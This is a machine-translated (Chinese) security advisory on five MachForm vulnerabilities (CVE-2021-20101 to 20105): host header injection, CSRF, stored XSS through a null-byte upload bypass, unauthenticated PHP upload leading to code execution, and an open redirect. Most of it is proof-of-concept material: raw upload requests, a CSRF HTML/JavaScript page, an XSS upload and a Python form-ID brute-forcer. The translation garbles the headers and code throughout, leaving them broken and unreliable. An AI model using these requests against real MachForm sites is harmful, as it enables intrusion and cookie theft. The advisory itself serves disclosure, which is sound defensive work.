Machform多个漏洞
高剧情简介
(1)HTTP主机头注射- cve - 2021 - 20101
CVSSv3基础分数:4.3
CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: U / C: L /我:N: N
CWE: 20
MachForm是容易HTTP主机头注入验证主机头的不当造成的。
这个漏洞可以利用通过web缓存中毒。这将涉及到攻击者中毒的缓存缓存代理运行的应用程序,比如CDN的例子。这将导致受害者被迫接受恶意的内容——包括了主机头。
如下所示的请求/响应的一个示例是受害者将是服务。我们可以看到,用户定向远离他们的目的网站一个潜在的恶意“https://evil.site/”。
这个漏洞被发现在很多地方在这个应用程序中,用户被重定向到一个位置基于用户的主机头。
= = = = = = = = = = = = = = = = = = = = = = = = = = =
概念验证
重现这个问题,下面的请求发送到目标。
获得/ machform / export_entries。php HTTP / 1.1 主持人:tenable.com 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 连接:关闭 Upgrade-Insecure-Requests: 1 |
然后,您将看到你重定向到tenable.com域
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
(2)跨站点请求伪造(CSRF) - cve - 2021 - 20102
CVSSv3基础分数:6.3
CVSSv3向量:(AV: N /交流:L /公关:N / UI: R / S: U / C: L /我:L /答:L)
CWE:352年
没有为MachForms CSRF保护。我们可以看到下面的POST请求,没有使用CSRF令牌。通过制作恶意链接或页面和骗取受害者的用户访问这些链接/页,攻击者可能会迫使受害者用户执行敏感的应用程序操作。
POST / machform /上传。php HTTP / 1.1 主持人:<目标地址> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:* / * 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 内容长度:622 连接:关闭 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " Filedata”;文件名= " test.pht " 内容类型:图像/ jpeg < ? php phpinfo (); ? > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " form_id " 11791年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " element_id " 39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " file_token " c7274582933239cb9789c0bf1615cf8e - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 - - - |
攻击者可以利用这个问题通过创建一个虚拟页面,在经过身份验证的用户的会话中执行javascript如果他们被骗使用恶意虚拟页面。
= = = = = = = = = = = = = = = = = = = = = = = = = =
概念验证
下面的HTML和javascript可以用来仿真示例站点。如果一个用户浏览虚拟网站,提交表单,恶意请求将代表用户上传.pht文件。
下面是一个例子假网站出于演示目的。请注意,为了测试这个你需要改变IP地址在HTML页面MachForms运行的服务器。
< html > <身体> <脚本>历史。pushState(“,”,“/”) > < /脚本 <脚本> submitRequest()函数 { var xhr = new XMLHttpRequest (); xhr。open(“文章”、“https: \ \ / <目标地址> \ / machform \ /上传。php”,真正的); xhr。setRequestHeader(“接受”,“* \ / *”); xhr。setRequestHeader(“接收语言”,“en - us, en; q = 0.5”); xhr。setRequestHeader(“内容类型”、“多部分\ /格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767”); xhr。withCredentials = true; 身体var = " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+ “附加项:格式;name = \“Filedata \”;文件名= \”测试。pht \“\ r \ n”+ “\ r \ n”+ “内容类型:图像/ jpeg \ r \ n”+ “\ r \ n”+ “\ x3c ?php \ r \ n”+ “phpinfo (); \ r \ n”+ ”?\ x3e \ n”+ “\ r \ n”+ “- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+ “附加项:格式;name = \“form_id \ \ r \ n + “\ r \ n”+ “11791 \ r \ n”+ “- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+ “附加项:格式;name = \“element_id \ \ r \ n + “\ r \ n”+ “39 \ r \ n”+ “- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 \ r \ n”+ “附加项:格式;name = \“file_token \ \ r \ n + “\ r \ n”+ “c7274582933239cb9789c0bf1615cf8e \ r \ n”+ “- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767——\ r \ n”; var一体= new Uint8Array (body.length); (var = 0;我< aBody.length;我+ +) 一体的[我]= body.charCodeAt(我); xhr。发送(新Blob((一体))); } > < /脚本 action = " # " > <形式 < input type = " button " value = " Submit请求" onclick = " submitRequest ();“/> > < /形式 < /身体> < / html > |
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
(3)未经身份验证的文件上传/扩展过滤器绕过- cve - 2021 - 20103
CVSSv3基础分数:7.1
CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: U / C: H /我:L /答:N
CWE:434年
指出在测试过程中,存储的目标是容易跨站脚本由于封锁不足通过upload.php文件附件上传的形式。利用这个攻击者需要附加一个null字节上传文件名绕过扩展验证。
未经过身份验证的攻击者可以利用这个问题注入恶意javascript时将执行浏览附件。这可以用来窃取其他用户cookie,迫使用户行为没有他们的知识。
= = = = = = = = = = = = = = = = = = = = = = = = = =
概念验证
重现这个问题,发送请求到以下MachForm目标。注意:您将需要改变目标IP地址的主机头的你自己的目标。
POST / machform /上传。php HTTP / 1.1 主持人:<你的目标地址> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:* / * 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 内容长度:597 连接:关闭 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " Filedata”;文件名= " test.html % 00” <脚本>警报(文件上传XSS) > < /脚本 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " form_id " 123年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " element_id " 39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 附加:格式;name = " file_token " faketoken - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -3605352724035825752253110767 - - - |
你可以看到,当浏览,浏览器呈现我们上传HTML和JavaScript。
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
(4)未经身份验证的文件上传远端控制设备- cve - 2021 - 20104
CVSSv3基础分数:8.1
CVSSv3向量:AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H
CWE:434年
MachForm容易未经身份验证的远程代码执行是由于没有检查通过upload.php某些文件扩展名的文件附件上传。
我们正在测试的系统在使用PHP 7.0和输入版本2.4.25和支持以下文件扩展名默认输入:. PHP、简单,.php4, .php5, .php7, .pht, .phtml。PHP。下面的代码片段我们可以看到pht, php7, php文件扩展名失踪的扩展黑名单。
这意味着我们可以上传任意PHP代码pht或php7扩展和远程服务器执行代码。在以下情况下,phpinfo()函数被称为在上传文件。
.pht上传示例
.php7上传示例
注意,不同的PHP版本支持不同的扩展。例如,PHP 7.4支持.phar . PHP、。PHP和.phtml。在这种情况下MachForm仍然是脆弱的,因为它不检查.phar或。php文件扩展名。
未经过身份验证的攻击者可以利用这个问题将恶意的PHP代码注入一种依恋pht或php7扩展,然后远程服务器执行代码无论用户拥有MachForm过程。
注意:为了使攻击者利用这个漏洞,一个活跃的形式必须已经存在MachForm实例,并攻击者会发现表单ID蛮干。Python脚本的一个例子可以用来实现这可能类似于以下:
进口的要求 Target_address = ' x.x.x.x ' 因为我在范围(20000): 打印(“测试ID: {}”.format(我)) id_probe =请求。get (" https:// " + target_address + ' / machform / embed.php ? id = {}“.format(我)) 如果id_probe。文本! =“这是无效的URL形式。”: id =我 打破 打印(' ID: {} ' .format (ID)) |
攻击者也需要发现上传文件的文件名进而增加复杂性利用这个漏洞。
= = = = = = = = = = = = = = = = = = = = = = = = =
概念验证
的一个例子如何pht文件上传和删除.tmp中可以看到以下的请求序列。
最初的文件上传:
POST / machform /上传。php HTTP / 1.1 主持人:<主机> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:* / * 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 内容长度:637 连接:关闭 饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 附加:格式;name = " Filedata”;文件名= " test.pht " 内容类型:应用程序/八进制 < ? php phpinfo (); ? > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 附加:格式;name = " form_id " 11791年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 附加:格式;name = " element_id " 39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 附加:格式;name = " file_token " f9bf32a6f41cac20da8596a42ef51e59 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -21333666862359421718924202306 - - - |
嵌入文件1(饼干):
POST / machform /嵌入。php HTTP / 1.1 主持人:<主机> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 内容长度:5568 连接:关闭 饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1 Upgrade-Insecure-Requests: 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_1_1 " 7 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_1_2 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_1_3 " 2021年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_1_datepick " 05/07/2021 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_31_1 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_31_2 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_33 " 123456789 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_32_1 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_32_2 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_15 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_16 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_17 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_18 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_19 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_20 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_21 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_22 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_40 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_3_1 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_3_2 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_3_3 " 2021年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_3_datepick " 05/05/2021 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_35 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_5 " 111年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_34 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_26 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_12 " 没有一个 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_7_3 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_7_other " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_6_6 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_8 " 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_24 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_25 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_36 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_37 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_9 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_10 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_11 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_13 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_38 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_23 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_39”;文件名= " " 内容类型:应用程序/八进制 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " element_39_token " f9bf32a6f41cac20da8596a42ef51e59 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " form_id " 11791年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " submit_form " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 附加:格式;name = " page_number " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -22398072442924133683001116694 - - - |
嵌入文件2:
POST / machform /嵌入。php HTTP / 1.1 主持人:<主机> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:多部分/格式;边界= - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 内容长度:5562 连接:关闭 饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1 Upgrade-Insecure-Requests: 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_1_1 " 7 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_1_2 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_1_3 " 2021年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_1_datepick " 05/07/2021 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_31_1 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_31_2 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_33 " 123456789 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_32_1 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_32_2 " 测试 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_15 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_16 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_17 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_18 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_19 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_20 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_21 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_22 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_40 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_3_1 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_3_2 " 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_3_3 " 2021年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_3_datepick " 05/05/2021 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_35 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_5 " 111年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_34 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_26 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_12 " 没有一个 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_7_3 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_7_other " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_6_6 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_8 " 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_24 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_25 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_36 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_37 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_9 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_10 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_11 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_13 " 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_38 " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_23 " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_39”;文件名= " " 内容类型:应用程序/八进制 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " element_39_token " f9bf32a6f41cac20da8596a42ef51e59 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " form_id " 11791年 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " submit_form " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 附加:格式;name = " page_number " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -99045264520754095121259953242 - - - |
确认1:
GET / machform / confirm_embed.php吗?mfsid HTTP / 1.1 = id = 11791 主持人:<主机> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 连接:关闭 饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1 Upgrade-Insecure-Requests: 1 |
确认2:
POST / machform / confirm_embed。php HTTP / 1.1 主持人:<主机> 用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 87.0)壁虎/ 20100101 / 87.0 接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8 接收语言:en - us, en; q = 0.5 接受编码:gzip压缩 内容类型:应用程序/ x-www-form-urlencoded 内容长度:39 连接:关闭 饼干:_ga = GA1.2.832054924.1614855353;PHPSESSID = jcgvfgsu37j8sk7lsedutieb41;mf_has_cookie = 1 Upgrade-Insecure-Requests: 1 id = 11791 &mf_page_from = 0 &review_submit = 1 |
注意:您将需要改变目标IP地址的主机头的你自己的目标。
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
(5)开放重定向- cve - 2021 - 20105
CVSSv3基础分数:4.7
CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: C / C: N /我:L /答:N
CWE:601年
Safari_init。php是容易开放的重定向的脆弱性。攻击者可以工艺的价值$ _GET [' ref ']随后在一个URL参数控制的价值“位置”HTTP响应头。这可以被滥用在钓鱼攻击重定向浏览器/用户恶意攻击者的选择的web页面。
引用=削减美元($ _GET [' ref ']);
介绍人美元= htmlspecialchars函数(base64_decode(推荐人美元),ENT_QUOTES);
setcookie (" mf_safari_cookie_fix ", " 1 ", 0);/ / cookie过期的会话(浏览器被关闭)
头(地点:{$介绍人});
= = = = = = = = = = = = = = = = = = = = = = = =
概念验证
例如,下面的URL重定向用户http://google.com。“裁判”的价值是base64编码。
/ machform / safari_init.php ? ref = aHR0cDovL2dvb2dsZS5jb20 =
和响应:
HTTP / 2 302
日期:2021年5月10日,星期一,18:33:52格林尼治时间
Apache服务器:
到期:星期四,1981年11月19日08:52:00格林尼治时间
cache - control: no - cache, must-revalidate没有商店
编译指示:no - cache
set - cookie: mf_safari_cookie_fix = 1
地点:http://google.com
内容长度:0
内容类型:text / html;utf - 8字符集=
解决方案
披露时间表
风险信息
cve - 2021 - 20102
cve - 2021 - 20103
cve - 2021 - 20104
cve - 2021 - 20105
Derrie萨顿